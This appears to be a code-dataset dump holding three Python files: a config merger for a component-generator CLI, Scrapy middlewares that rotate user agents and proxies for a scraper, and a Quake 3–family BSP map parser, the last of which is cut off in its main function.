hexsha stringlengths 40 40 | size int64 4 1.02M | ext stringclasses 8
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 4 209 | max_stars_repo_name stringlengths 5 121 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 209 | max_issues_repo_name stringlengths 5 121 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 209 | max_forks_repo_name stringlengths 5 121 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 4 1.02M | avg_line_length float64 1.07 66.1k | max_line_length int64 4 266k | alphanum_fraction float64 0.01 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
8baa0bbad2a459368cf5f2bc12134a0f82c3948a | 1,961 | py | Python | new_component/_config.py | iancleary/new-component | f287fb2afd34a5aa50e043c190bd35179e5816b9 | [
"MIT"
] | null | null | null | new_component/_config.py | iancleary/new-component | f287fb2afd34a5aa50e043c190bd35179e5816b9 | [
"MIT"
] | 4 | 2022-02-02T06:57:06.000Z | 2022-02-05T01:05:52.000Z | new_component/_config.py | iancleary/new-component | f287fb2afd34a5aa50e043c190bd35179e5816b9 | [
"MIT"
] | 1 | 2022-02-03T03:29:05.000Z | 2022-02-03T03:29:05.000Z | import json
from new_component._constants import (
DEFAULT_COMPONENTS_DIR,
DEFAULT_FILE_EXTENSION,
GLOBAL_CONFIG_FILE,
LOCAL_CONFIG_FILE,
)
def _load_config() -> dict:
"""
Loads config from global and local scopes, if they exist.
"""
file_config = {}
if LOCAL_CONFIG_FILE.exists():
f = open(LOCAL_CONFIG_FILE)
file_config["local"] = json.load(f)
f.close()
if GLOBAL_CONFIG_FILE.exists():
f = open(GLOBAL_CONFIG_FILE)
file_config["global"] = json.load(f)
f.close()
return file_config
def _merge_config(
file_config: dict, directory: str = None, extension: str = None
) -> dict:
"""
Merge config values, with command-line values overwriting local values,
and local values overwriting global ones.
"""
config = {}
# This should confirm keys match API
if "global" in file_config.keys():
config.update(file_config["global"])
# This should confirm keys match API
if "local" in file_config.keys():
config.update(file_config["local"])
# Merge directory config and parameter
if directory is not None:
config.update({"directory": directory})
elif "directory" in config.keys():
# directory configured via global or local config file
pass
else:
# no config nor option specified, use default
config.update({"directory": DEFAULT_COMPONENTS_DIR})
# Merge directory config and parameter
if extension is not None:
config.update({"extension": extension})
elif "extension" in config.keys():
# extension configured via global or local config file
pass
else:
# no config nor option specified, use default
config.update({"extension": DEFAULT_FILE_EXTENSION})
# DEBUG
# with open("./.new-component-merged-config.json", "w") as outfile:
# json.dump(config, outfile, indent=4)
return config
| 26.863014 | 75 | 0.650178 |
f32178d0c19a0d32978de362d5e6255491b0f42b | 5,052 | py | Python | shunqiwang/middlewares.py | JonnyLe/shunqiwang_by_scrapy | 174e3cf0afa4ee2e137b88b0a40877ad1e9f95cb | [
"Apache-2.0"
] | 4 | 2019-05-02T01:31:14.000Z | 2019-12-06T02:07:14.000Z | shunqiwang/middlewares.py | JonnyLe/shunqiwang_by_scrapy | 174e3cf0afa4ee2e137b88b0a40877ad1e9f95cb | [
"Apache-2.0"
] | null | null | null | shunqiwang/middlewares.py | JonnyLe/shunqiwang_by_scrapy | 174e3cf0afa4ee2e137b88b0a40877ad1e9f95cb | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Define here the models for your spider middleware
#
# See documentation in:
# https://doc.scrapy.org/en/latest/topics/spider-middleware.html
from scrapy import signals
from shunqiwang import settings
import logging,random,base64
class ShunqiwangSpiderMiddleware(object):
# Not all methods need to be defined. If a method is not defined,
# scrapy acts as if the spider middleware does not modify the
# passed objects.
@classmethod
def from_crawler(cls, crawler):
# This method is used by Scrapy to create your spiders.
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def process_spider_input(self, response, spider):
# Called for each response that goes through the spider
# middleware and into the spider.
# Should return None or raise an exception.
return None
def process_spider_output(self, response, result, spider):
# Called with the results returned from the Spider, after
# it has processed the response.
# Must return an iterable of Request, dict or Item objects.
for i in result:
yield i
def process_spider_exception(self, response, exception, spider):
# Called when a spider or process_spider_input() method
# (from other spider middleware) raises an exception.
# Should return either None or an iterable of Response, dict
# or Item objects.
pass
def process_start_requests(self, start_requests, spider):
# Called with the start requests of the spider, and works
# similarly to the process_spider_output() method, except
# that it doesn’t have a response associated.
# Must return only requests (not items).
for r in start_requests:
yield r
def spider_opened(self, spider):
spider.logger.info('Spider opened: %s' % spider.name)
class ShunqiwangDownloaderMiddleware(object):
# Not all methods need to be defined. If a method is not defined,
# scrapy acts as if the downloader middleware does not modify the
# passed objects.
@classmethod
def from_crawler(cls, crawler):
# This method is used by Scrapy to create your spiders.
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def process_request(self, request, spider):
# Called for each request that goes through the downloader
# middleware.
# Must either:
# - return None: continue processing this request
# - or return a Response object
# - or return a Request object
# - or raise IgnoreRequest: process_exception() methods of
# installed downloader middleware will be called
return None
def process_response(self, request, response, spider):
# Called with the response returned from the downloader.
# Must either;
# - return a Response object
# - return a Request object
# - or raise IgnoreRequest
return response
def process_exception(self, request, exception, spider):
# Called when a download handler or a process_request()
# (from other downloader middleware) raises an exception.
# Must either:
# - return None: continue processing this exception
# - return a Response object: stops process_exception() chain
# - return a Request object: stops process_exception() chain
pass
def spider_opened(self, spider):
spider.logger.info('Spider opened: %s' % spider.name)
class ShunqiwangUserAgentMiddleware(object):
logger = logging.getLogger(__name__)
def process_request(self,request,spider):
user_agent = random.choice(settings.USER_AGENT)
print('User-Agent:',user_agent)
request.headers.setdefault('User-Agent',user_agent)
return None
def process_response(self,request,response,spider):
return response
def process_exception(self,request,exception,spider):
self.logger.debug(exception)
return request
class ShunqiwangProxyMiddleware(object):
logger = logging.getLogger(__name__)
def process_request(self,request,spider):
proxy = random.choice(settings.PROXIES)
print('proxy:', proxy)
if proxy['user_password'] == '':
request.meta['proxy'] = 'https://' + proxy['ip_port']
# request.meta['proxy'] = proxy['ip_port']
else:
base64_user_passwd = base64.encode(proxy['user_password'])
request.headers['Proxy-Authorization'] = 'Basic' + base64_user_passwd
# request.meta['proxy'] = 'https://' + proxy['ip_port']
request.meta['proxy'] = proxy['ip_port']
return None
def process_response(self,request,response,spider):
return response
def process_exception(self,request,exception,spider):
self.logger.debug(exception)
return request | 35.083333 | 81 | 0.666271 |
4b43c33eb40c771ba7d85025bfc42e91538dbbe9 | 28,100 | py | Python | Urcheon/Bsp.py | necessarily-equal/Urcheon | 1a6ce7acf5d0c9ac12dc3e51f0de9bf537c8d433 | [
"0BSD"
] | 5 | 2015-03-11T05:45:49.000Z | 2015-12-08T09:53:30.000Z | Urcheon/Bsp.py | necessarily-equal/Urcheon | 1a6ce7acf5d0c9ac12dc3e51f0de9bf537c8d433 | [
"0BSD"
] | 20 | 2015-03-09T01:16:36.000Z | 2017-02-13T09:51:02.000Z | Urcheon/Bsp.py | necessarily-equal/Urcheon | 1a6ce7acf5d0c9ac12dc3e51f0de9bf537c8d433 | [
"0BSD"
] | 1 | 2022-01-08T01:13:12.000Z | 2022-01-08T01:13:12.000Z | #! /usr/bin/env python3
#-*- coding: UTF-8 -*-
### Legal
#
# Author: Thomas DEBESSE <dev@illwieckz.net>
# License: ISC
#
from Urcheon import Map
from Urcheon import Ui
import __main__ as m
import argparse
import glob
import json
import logging
import os
import struct
import sys
from collections import OrderedDict
from logging import debug
from PIL import Image
class Lump():
bsp_parser_dict = None
def readBspDirLump(self, dir_name, lump_name):
file_list = glob.glob(dir_name + os.path.sep + lump_name + os.path.extsep + "*")
if len(file_list) > 1:
# TODO: handle that
Ui.error("more than one " + lump_name + " lump in bspdir")
if len(file_list) == 0:
# TODO: warning?
return
file_path = file_list[0]
file_ext = os.path.splitext(file_path)[-1][1:]
file_name = os.path.splitext(os.path.basename(file_path))[0]
if file_ext == "bin":
if file_name in self.bsp_parser_dict["lump_name_list"]:
blob_file = open(file_path, "rb")
self.importLump(blob_file.read())
blob_file.close()
else:
Ui.error("unknown lump file: " + file_name)
elif not self.validateExtension(file_ext):
Ui.error("unknown lump format: " + file_path)
if file_ext == "d":
self.readDir(file_path)
else:
self.readFile(file_path)
class Blob(Lump):
blob_stream = None
def isEmpty(self):
return not self.blob_stream
def readFile(self, file_name):
blob_file = open(file_name, "rb")
self.importLump(blob_file.read())
blob_file.close()
return True
def writeFile(self, file_name):
blob_file = open(file_name, "wb")
blob_file.write(self.exportLump())
blob_file.close()
def writeBspDirLump(self, dir_name, lump_name):
self.writeFile(dir_name + os.path.sep + lump_name + os.path.extsep + "bin")
def importLump(self, blob):
self.blob_stream = blob
def exportLump(self):
return self.blob_stream
class Q3Entities(Lump):
entities_as_map = None
def isEmpty(self):
return not self.entities_as_map
def validateExtension(self, file_ext):
return file_ext == "txt"
def readFile(self, file_name):
entities_file = open(file_name, "rb")
self.importLump(entities_file.read())
entities_file.close()
return True
def writeFile(self, file_name):
entities_file = open(file_name, "wb")
entities_file.write(self.exportLump().split(b'\0', 1)[0])
entities_file.close()
return True
def writeBspDirLump(self, dir_name, lump_name):
self.writeFile(dir_name + os.path.sep + lump_name + os.path.extsep + "txt")
def printString(self):
print(bytes.decode(self.exportLump().split(b'\0', 1)[0]))
def printList(self):
print("*** Entities")
i = 0
for entity in self.entities_as_map.entity_list:
string = ""
for thing in entity.thing_list:
if isinstance(thing, Map.KeyValue):
string += "\"" + thing.key + "\": \"" + thing.value + "\", "
print(str(i) + ": [" + string[:-2] + "]")
i += 1
print("")
return True
def printSoundList(self):
print("*** Entities")
i = 0
for entity in self.entities_as_map.entity_list:
found = False
for thing in entity.thing_list:
if isinstance(thing, Map.KeyValue):
for sound_keyword in Map.q3_sound_keyword_list:
if thing.key.lower() == sound_keyword.lower():
print(str(i) + ": " + thing.value + " [" + sound_keyword + "]")
i += 1
print("")
return True
def substituteKeywords(self, substitution):
self.entities_as_map.substituteKeywords(substitution)
def lowerCaseFilePaths(self):
self.entities_as_map.lowerCaseFilePaths()
def importLump(self, blob):
self.entity_list = []
entities_bstring = blob.split(b'\0', 1)[0]
self.entities_as_map = Map.Map()
self.entities_as_map.numbering_enabled = False
self.entities_as_map.readBlob(entities_bstring)
def exportLump(self):
blob = b''
blob += self.entities_as_map.exportFile().encode()
blob += b'\0'
return blob
class Q3Textures(Lump):
texture_list = None
def int2bstr(self, i):
return "{0:b}".format(i).zfill(30)
def bstr2int(self, s):
return int(s, 2)
def isEmpty(self):
return not self.texture_list
def validateExtension(self, file_ext):
return file_ext == "csv"
def readFile(self, file_name):
# TODO: check
textures_file = open(file_name, 'rb')
textures_file_bstring = textures_file.read()
self.texture_list = []
for texture_line_bstring in textures_file_bstring.split(b'\n'):
# TODO: check 3 comma minimum
# TODO: allow string path with comma
if texture_line_bstring != b'':
bstring_list = texture_line_bstring.split(b',')
flags = self.bstr2int(bstring_list[0])
contents = self.bstr2int(bstring_list[1])
name = bytes.decode(bstring_list[2])
self.texture_list.append({"name": name, "flags": flags, "contents": contents})
textures_file.close()
return True
def writeFile(self, file_name):
textures_string = ""
for i in range(0, len(self.texture_list)):
textures_string += self.int2bstr(self.texture_list[i]["flags"]) + ","
textures_string += self.int2bstr(self.texture_list[i]["contents"]) + ","
textures_string += self.texture_list[i]["name"] + "\n"
# TODO: check
textures_file = open(file_name, "wb")
textures_file.write(textures_string.encode())
textures_file.close()
def writeBspDirLump(self, dir_name, lump_name):
self.writeFile(dir_name + os.path.sep + lump_name + os.path.extsep + "csv")
def printList(self):
# TODO: check
print("*** Textures:")
for i in range(0, len(self.texture_list)):
print(str(i) + ": " + self.texture_list[i]["name"] + " [" + self.int2bstr(self.texture_list[i]["flags"]) + ", " + self.int2bstr(self.texture_list[i]["contents"]) + "]")
print("")
def lowerCaseFilePaths(self):
textures_count = len(self.texture_list)
for i in range(0, textures_count):
self.texture_list[i]["name"] = self.texture_list[i]["name"].lower()
def importLump(self, blob):
# TODO: check exists
# 64 bytes string name
# 4 bytes integer flags
# 4 bytes integer contents
textures_count = int(len(blob) / 72)
self.texture_list = []
# TODO: check
for i in range(0, textures_count):
offset = i * 72
bstring = blob[offset:offset + 64]
name = bytes.decode(bstring.split(b'\0', 1)[0])
flags, contents = struct.unpack('<II', blob[offset + 64: offset + 72])
self.texture_list.append({})
self.texture_list[i]["name"] = name
self.texture_list[i]["flags"] = flags
self.texture_list[i]["contents"] = contents
def exportLump(self):
blob = b''
for i in range(0, len(self.texture_list)):
flags_buint=(self.texture_list[i]["flags"]).to_bytes(4, "little")
contents_buint=(self.texture_list[i]["contents"]).to_bytes(4, "little")
# Always add \x00, then pad
name_bstring = (self.texture_list[i]["name"]).encode() + b'\0'
# TODO: check < 64
for i in range(0, (64 - len(name_bstring))):
name_bstring += b'\0'
blob += name_bstring + flags_buint + contents_buint
return blob
class Q3Lightmaps(Lump):
lightmap_list = []
lightmap_colorspace = "RGB"
lightmap_width = 128
lightmap_height = 128
lightmap_depth = 3
lightmap_size = lightmap_width * lightmap_height * lightmap_depth
lightmap_line_size = lightmap_width * lightmap_depth
lightmap_resolution = str(lightmap_width) + "x" + str(lightmap_height) + "x" + str(lightmap_depth)
def printList(self):
print("*** Lightmaps:")
for i in range(0, len(self.lightmap_list)):
print("#" + str(i) + ": [" + self.lightmap_resolution + ", " + self.lightmap_colorspace + ", " + str(len(self.lightmap_list[i])) + "]")
print("")
return True
def isEmpty(self):
return not self.lightmap_list
def validateExtension(self, file_ext):
return file_ext == "d"
def readDir(self, dir_name):
# TODO: check if a dir, perhaps argparse can do
self.lightmap_list = []
file_list = sorted(glob.glob(dir_name + os.path.sep + "lm_*" + os.path.extsep + "*"))
for file_name in file_list:
debug("loading lightmap: " + file_name)
image = Image.open(file_name)
lightmap = image.convert(self.lightmap_colorspace).tobytes()
lightmap_size = int(len(lightmap))
if lightmap_size != self.lightmap_size:
Ui.error("bad file " + file_name + ", must be a " + self.lightmap_resolution + " picture, found " + str(lightmap_size) + ", expected " + str(self.lightmap_size))
self.lightmap_list.append(lightmap)
def writeDir(self, dir_name):
if not os.path.exists(dir_name):
os.makedirs(dir_name, exist_ok=True)
for i in range(0, len(self.lightmap_list)):
file_name = "lm_" + str(i).zfill(4) + os.path.extsep + "tga"
# TODO: os independent:
file_path = dir_name + os.path.sep + file_name
# TODO: check
lightmap_file = open(file_path, "wb")
# 1: Identification field length (see later for my arbitrary 18 chars string, here 18, up to 255)
# 1: No color map
# 1: Type 2 (RGB)
# 5: Color map spec (ignored)
header = b'\x12\0\x02\0\0\0\0\0'
# 2: Origin X
# 2: Origin Y
header += b'\0\0\0\0'
# 2: Width
# 2: Height
header += self.lightmap_width.to_bytes(2, "little")
header += self.lightmap_height.to_bytes(2, "little")
# 1: Bits per pixels (24)
header += (self.lightmap_depth * 8).to_bytes(1, "little")
# 1: Attribute bits (0 for 24)
header += b'\0'
header += b'Granger loves you\0'
raw = self.lightmap_list[i]
data = b''
# Last line is first line
for j in range(0, self.lightmap_size, self.lightmap_line_size):
line = raw[self.lightmap_size - self.lightmap_line_size - j : self.lightmap_size - j]
# RGB → BGR
for k in range(0, self.lightmap_line_size, self.lightmap_depth):
data += line[k : k + self.lightmap_depth][::-1]
debug("header length: " + str(len(header)))
debug("data length: " + str(len(data)))
blob = header + data
lightmap_file.write(blob)
lightmap_file.close()
def writeBspDirLump(self, dir_name, lump_name):
self.writeDir(dir_name + os.path.sep + lump_name + os.path.extsep + "d")
def importLump(self, blob):
self.lightmap_list = []
lump_count = int(len(blob) / self.lightmap_size)
for i in range(0, lump_count):
self.lightmap_list.append(blob[i * self.lightmap_size : (i + 1) * self.lightmap_size])
return True
def exportLump(self):
blob = b''
# TODO: better
for i in range(0, len(self.lightmap_list)):
blob += self.lightmap_list[i]
return blob
class QFLightmaps(Q3Lightmaps):
lightmap_list = []
lightmap_colorspace = "RGB"
lightmap_width = 512
lightmap_height = 512
lightmap_depth = 3
lightmap_size = lightmap_width * lightmap_height * lightmap_depth
lightmap_line_size = lightmap_width * lightmap_depth
lightmap_resolution = str(lightmap_width) + "x" + str(lightmap_height) + "x" + str(lightmap_depth)
class Bsp():
def __init__(self, bsp_magic_number=None, bsp_version=None):
self.bsp_file = None
self.bsp_file_name = None
# metadata for printing purpose
self.lump_directory = {}
self.sound_list = None
# lumps are stored here
self.lump_dict = {}
if bsp_magic_number and bsp_version:
# TODO: make user able to set it with command line option
self.bsp_magic_number = bsp_magic_number
self.bsp_version = bsp_version
else:
# default bsp format
self.bsp_magic_number = "IBSP"
self.bsp_version = 46
self.bsp_parser_dict = bsp_dict[self.bsp_magic_number][self.bsp_version]
def readFile(self, bsp_file_name):
# TODO: check
self.bsp_file_name = bsp_file_name
self.bsp_file = open(self.bsp_file_name, 'rb')
# FIXME: check file length
read_bsp_magic_number = self.bsp_file.read(4).decode()
for bsp_magic_number in bsp_dict.keys():
if bsp_magic_number == read_bsp_magic_number:
self.bsp_magic_number = bsp_magic_number
break
else:
self.bsp_magic_number = None
if not self.bsp_magic_number:
self.bsp_file.close()
self.bsp_file = None
Ui.error(": unknown BSP magic number " + str(read_bsp_magic_number))
self.bsp_file.seek(len(self.bsp_magic_number))
# FIXME: check file length
read_bsp_version = struct.unpack('<I', self.bsp_file.read(4))[0]
for bsp_version in bsp_dict[self.bsp_magic_number].keys():
if bsp_version == read_bsp_version:
self.bsp_version = bsp_version
break
if not self.bsp_version:
self.bsp_file.close()
self.bsp_file = None
Ui.error(": unknown BSP version " + str(read_bsp_version))
self.bsp_parser_dict = bsp_dict[self.bsp_magic_number][self.bsp_version]
self.readLumpList()
for lump_name in self.bsp_parser_dict["lump_name_list"]:
self.readLump(lump_name)
self.bsp_file.close()
def readDir(self, dir_name):
# TODO: check if a dir, perhaps argparse can do
bsp_description_file_path = os.path.join(dir_name, "bsp.json")
if os.path.isfile(bsp_description_file_path):
bsp_description_file = open(bsp_description_file_path, "r")
bsp_json_dict = json.loads(bsp_description_file.read())
bsp_description_file.close()
self.bsp_magic_number = bsp_json_dict["bsp_magic_number"]
self.bsp_version = bsp_json_dict["bsp_version"]
else:
# backward compatibility with early bspdir
self.bsp_magic_number = "IBSP"
self.bsp_version = 46
self.bsp_parser_dict = bsp_dict[self.bsp_magic_number][self.bsp_version]
for lump_name in self.bsp_parser_dict["lump_name_list"]:
file_list = glob.glob(dir_name + os.path.sep + lump_name + os.path.extsep + "*")
if len(file_list) > 1:
# TODO: handling
Ui.error("more than one " + lump_name + " lump in bspdir")
if len(file_list) == 0:
# TODO: warning?
continue
file_path = file_list[0]
file_ext = os.path.splitext(file_path)[-1][1:]
file_name = os.path.splitext(os.path.basename(file_path))[0]
lump = self.bsp_parser_dict["lump_dict"][lump_name]()
lump.bsp_parser_dict = self.bsp_parser_dict
lump.readBspDirLump(dir_name, lump_name)
self.lump_dict[lump_name] = lump.exportLump()
self.lump_directory[lump_name] = {}
self.lump_directory[lump_name]["offset"] = None
self.lump_directory[lump_name]["length"] = None
def printFileName(self):
print("*** File:")
print(self.bsp_file_name)
print("")
def substituteKeywords(self, substitution):
for lump_name in ["entities"]:
if lump_name in self.lump_dict:
lump = self.bsp_parser_dict["lump_dict"][lump_name]()
lump.importLump(self.lump_dict[lump_name])
lump.substituteKeywords(substitution)
self.lump_dict[lump_name] = lump.exportLump()
def lowerCaseFilePaths(self):
for lump_name in ["entities", "textures"]:
if lump_name in self.lump_dict:
lump = self.bsp_parser_dict["lump_dict"][lump_name]()
lump.importLump(self.lump_dict[lump_name])
lump.lowerCaseFilePaths()
self.lump_dict[lump_name] = lump.exportLump()
def readLumpList(self):
self.lump_directory = {}
# TODO: check
larger_offset = 0
ql_advertisements_offset = 0
for lump_name in self.bsp_parser_dict["lump_name_list"]:
# FIXME: q3 centric
# 4 bytes string magic number (IBSP)
# 4 bytes integer version
# 4 bytes integer lump offset
# 4 bytes integer lump size
self.bsp_file.seek(8 + (self.bsp_parser_dict["lump_name_list"].index(lump_name) * 8))
self.lump_directory[lump_name] = {}
offset, length = struct.unpack('<II', self.bsp_file.read(8))
# QuakeLive Hack, an extra advertisement lump is added
# at the end of IBSP 47 but original IBSP 47 (RTCW) does
# not have it.
# It looks like there is no way to test its presence other
# than testing if read value is garbage or not and praying
# for not getting garbage value that would be coincidentally
# equal to the largest offset encountered, basically pray for
# map compilers to not write the first characters of the
# optional custom string the way they form a number equal to
# the largest offset of legit lumps.
# Also, pray for advertised last lump length being properly
# 4-bytes aligned.
if lump_name == "advertisements":
if offset != ql_advertisements_offset:
offset, length = (larger_offset, 0)
else:
if offset > larger_offset:
larger_offset = offset
ql_advertisements_offset = offset + length
self.lump_directory[lump_name]["offset"], self.lump_directory[lump_name]["length"] = (offset, length)
self.lump_dict[lump_name] = None
def printLumpList(self):
# TODO: check
print("*** Lumps:")
for i in range(0, len(self.bsp_parser_dict["lump_name_list"])):
lump_name = self.bsp_parser_dict["lump_name_list"][i]
if lump_name in self.lump_directory:
if not self.lump_directory[lump_name]["offset"]:
# bspdir, length is also unknown
print(str(i) + ": " + lump_name )
else:
print(str(i) + ": " + lump_name + " [" + str(self.lump_directory[lump_name]["offset"]) + ", " + str(self.lump_directory[lump_name]["length"]) + "]")
print("")
def readLump(self, lump_name):
# TODO: check
# 4 bytes string magic number (IBSP)
# 4 bytes integer version
# 4 bytes integer lump offset
# 4 bytes integer lump size
self.bsp_file.seek(8 + (self.bsp_parser_dict["lump_name_list"].index(lump_name) * 8))
offset, length = struct.unpack('<II', self.bsp_file.read(8))
self.bsp_file.seek(offset)
self.lump_dict[lump_name] = self.bsp_file.read(length)
def writeFile(self, bsp_file_name):
bsp_file = open(bsp_file_name, "wb")
# Must be a multiple of 4
metadata_blob = b'Granger loves you!\0\0'
lumps_blob = b''
directory_blob = b''
# FIXME: q3-centric
# 4 bytes string magic number (IBSP)
# 4 bytes integer version
# 4 bytes integer lump offset per lump
# 4 bytes integer lump size per lump
# 17 lumps + 1 extra empty lump (Quake Live advertisements)
lump_count = len(self.bsp_parser_dict["lump_name_list"])
# Hack: if IBSP 46 (Quake 3), add extra empty lump because q3map2 loads
# advertisements lump from Quake Live even if not there, mistakenly
# computing lump offset from random data (usually from custom string).
# This way we ensure q3map2 will not load garbage by mistake
# and produced bsp are always fine even when read by broken tools.
if self.bsp_magic_number == "IBSP" and self.bsp_version == 46:
lump_count += 1
lump_start = 8 + lump_count * 8 + len(metadata_blob)
for lump_name in self.bsp_parser_dict["lump_name_list"]:
if lump_name in self.lump_dict:
lump_content = self.lump_dict[lump_name]
lump_length = len(self.lump_dict[lump_name])
else:
lump_content = b""
lump_length = 0
print(str(self.bsp_parser_dict["lump_name_list"].index(lump_name)) + ": " + lump_name + " [" + str(lump_start) + ", " + str(lump_length) + "]")
directory_blob += lump_start.to_bytes(4, "little")
directory_blob += lump_length.to_bytes(4, "little")
lump_start += lump_length
lumps_blob += lump_content
# Align lump to 4 bytes if not empty
# For reference, q3map2 does not count these extra bytes in lump length
# This happens for entities string for example
if lump_length != 0 and lump_length % 4 != 0:
for missing_byte in range(0, 4 - (lump_length % 4)):
lumps_blob += b'\0'
lump_start += 1
# silence pylint on unused variable
missing_byte
# Hack: see above for more explanations,
# if IBSP 46 (Quake 3), add extra empty lump because q3map2 loads
# advertisements lump from Quake Live even if not there.
if self.bsp_magic_number == "IBSP" and self.bsp_version == 46:
directory_blob += lump_start.to_bytes(4, "little") + b"\0\0\0\0"
blob = self.bsp_magic_number.encode()
blob += self.bsp_version.to_bytes(4, "little")
blob += directory_blob
blob += metadata_blob
blob += lumps_blob
bsp_file.write(blob)
bsp_file.close()
def writeDir(self, dir_name):
if not os.path.exists(dir_name):
os.makedirs(dir_name, exist_ok=True)
for lump_name in self.bsp_parser_dict["lump_name_list"]:
lump = self.bsp_parser_dict["lump_dict"][lump_name]()
if lump_name in self.lump_dict:
lump.importLump(self.lump_dict[lump_name])
if not lump.isEmpty():
lump.writeBspDirLump(dir_name, lump_name)
bsp_json_dict = {
"bsp_magic_number": self.bsp_magic_number,
"bsp_version": self.bsp_version,
}
bsp_description_file_path = os.path.join(dir_name, "bsp.json")
bsp_description_file = open(bsp_description_file_path, "w")
bsp_description_file.write(json.dumps(bsp_json_dict, sort_keys=True, indent="\t"))
bsp_description_file.close()
def importLump(self, lump_name, blob):
self.lump_dict[lump_name] = blob
def exportLump(self, lump_name):
if lump_name in self.lump_dict.keys():
return self.lump_dict[lump_name]
else:
return b""
# must be defined after classes otherwise Python will not find references
# see http://www.mralligator.com/q3/
q3_lump_dict = OrderedDict()
q3_lump_dict["entities"] = Q3Entities
q3_lump_dict["textures"] = Q3Textures
q3_lump_dict["planes"] = Blob
q3_lump_dict["nodes"] = Blob
q3_lump_dict["leafs"] = Blob
q3_lump_dict["leaffaces"] = Blob
q3_lump_dict["leafbrushes"] = Blob
q3_lump_dict["models"] = Blob
q3_lump_dict["brushes"] = Blob
q3_lump_dict["brushsides"] = Blob
q3_lump_dict["vertexes"] = Blob
q3_lump_dict["meshverts"] = Blob
q3_lump_dict["effects"] = Blob
q3_lump_dict["faces"] = Blob
q3_lump_dict["lightmaps"] = Q3Lightmaps
q3_lump_dict["lightvols"] = Blob
q3_lump_dict["visdata"] = Blob
q3_lump_name_list = list(q3_lump_dict.keys())
ql_lump_dict = q3_lump_dict.copy()
ql_lump_dict["advertisements"] = Blob
ql_lump_name_list = list(ql_lump_dict.keys())
ja_lump_dict = q3_lump_dict.copy()
ja_lump_dict["lightarray"] = Blob
ja_lump_name_list = list(ja_lump_dict.keys())
qf_lump_dict = q3_lump_dict.copy()
qf_lump_dict["lightmaps"] = QFLightmaps
qf_lump_dict["lightarray"] = Blob
qf_lump_name_list = list(qf_lump_dict.keys())
fbsp_dict = {
# Warsow uses version 1
# it's an RBSP derivative with larger lightmaps
1: {
"lump_dict": qf_lump_dict,
"lump_name_list": qf_lump_name_list,
}
}
ibsp_dict = {
# Quake 2, not supported yet
# 19: {},
# Quake 3 Arena, Tremulous, World of Padman, Xonotic, Unvanquished, etc.
46: {
"lump_dict": q3_lump_dict,
"lump_name_list": q3_lump_name_list,
},
# RCTW, Wolf:ET, Quake Live, etc.
47: {
"lump_dict": ql_lump_dict,
"lump_name_list": ql_lump_name_list,
},
}
rbsp_dict = {
# Both JA, JK2, Soldier of Fortune use version 1
1: {
"lump_dict": ja_lump_dict,
"lump_name_list": ja_lump_name_list,
}
}
bsp_dict = {
# QFusion
"FBSP": fbsp_dict,
# id Tech 3
"IBSP": ibsp_dict,
# Raven
"RBSP": rbsp_dict,
# Valve/Source, not supported yet
# see https://developer.valvesoftware.com/wiki/Source_BSP_File_Format
# "VBSP": {},
}
def main(stage=None):
# TODO: check files
if stage:
prog_name = os.path.basename(m.__file__) + " " + stage
else:
prog_name = os.path.basename(m.__file__)
description="%(prog)s is a BSP parser for my lovely granger."
args = argparse.ArgumentParser(description=description, prog=prog_name)
args.add_argument("-D", "--debug", help="print debug information", action="store_true")
args.add_argument("-ib", "--input-bsp", dest="input_bsp_file", metavar="FILENAME", help="read from .bsp file %(metavar)s")
args.add_argument("-id", "--input-bspdir", dest="input_bsp_dir", metavar="DIRNAME", help="read from .bspdir directory %(metavar)s")
args.add_argument("-ob", "--output-bsp", dest="output_bsp_file", metavar="FILENAME", help="write to .bsp file %(metavar)s")
args.add_argument("-od", "--output-bspdir", dest="output_bsp_dir", metavar="DIRNAME", help="write to .bspdir directory %(metavar)s")
args.add_argument("-ie", "--input-entities", dest="input_entities_file", metavar="FILENAME", help="read from entities .txt file %(metavar)s")
args.add_argument("-oe", "--output-entities", dest="output_entities_file", metavar="FILENAME", help="write to entities .txt file %(metavar)s")
args.add_argument("-it", "--input-textures", dest="input_textures_file", metavar="FILENAME", help="read rom textures .csv file %(metavar)s")
args.add_argument("-ot", "--output-textures", dest="output_textures_file", metavar="FILENAME", help="write to textures .csv file %(metavar)s")
args.add_argument("-il", "--input-lightmaps", dest="input_lightmaps_dir", metavar="DIRNAME", help="read from lightmaps directory %(metavar)s")
args.add_argument("-ol", "--output-lightmaps", dest="output_lightmaps_dir", metavar="DIRNAME", help="write to lightmaps directory %(metavar)s")
args.add_argument("-sl", "--strip-lightmaps", help="empty the lightmap lump", action="store_true")
args.add_argument("-sk", "--substitute-keywords", dest="substitute_keywords", metavar="FILENAME", help="use entity keyword substitution rules from .csv file %(metavar)s")
args.add_argument("-Lf', '--lowercase-filepaths", dest="lowercase_filepaths", help="lowercase file paths", action="store_true")
args.add_argument("-la", "--list-all", help="list all", action="store_true")
args.add_argument("-lL", "--list-lumps", help="list lumps", action="store_true")
args.add_argument("-le", "--list-entities", help="list entities", action="store_true")
args.add_argument("-ls", "--list-sounds", help="list sounds", action="store_true")
args.add_argument("-lt", "--list-textures", help="list textures", action="store_true")
args.add_argument("-ll", "--list-lightmaps", help="list lightmaps", action="store_true")
args.add_argument("-pe", "--print-entities", help="print entities", action="store_true")
args = args.parse_args()
if args.debug:
logging.basicConfig(stream=sys.stderr, level=logging.DEBUG)
debug("Debug logging activated")
debug("args: " + str(args))
bsp = Bsp()
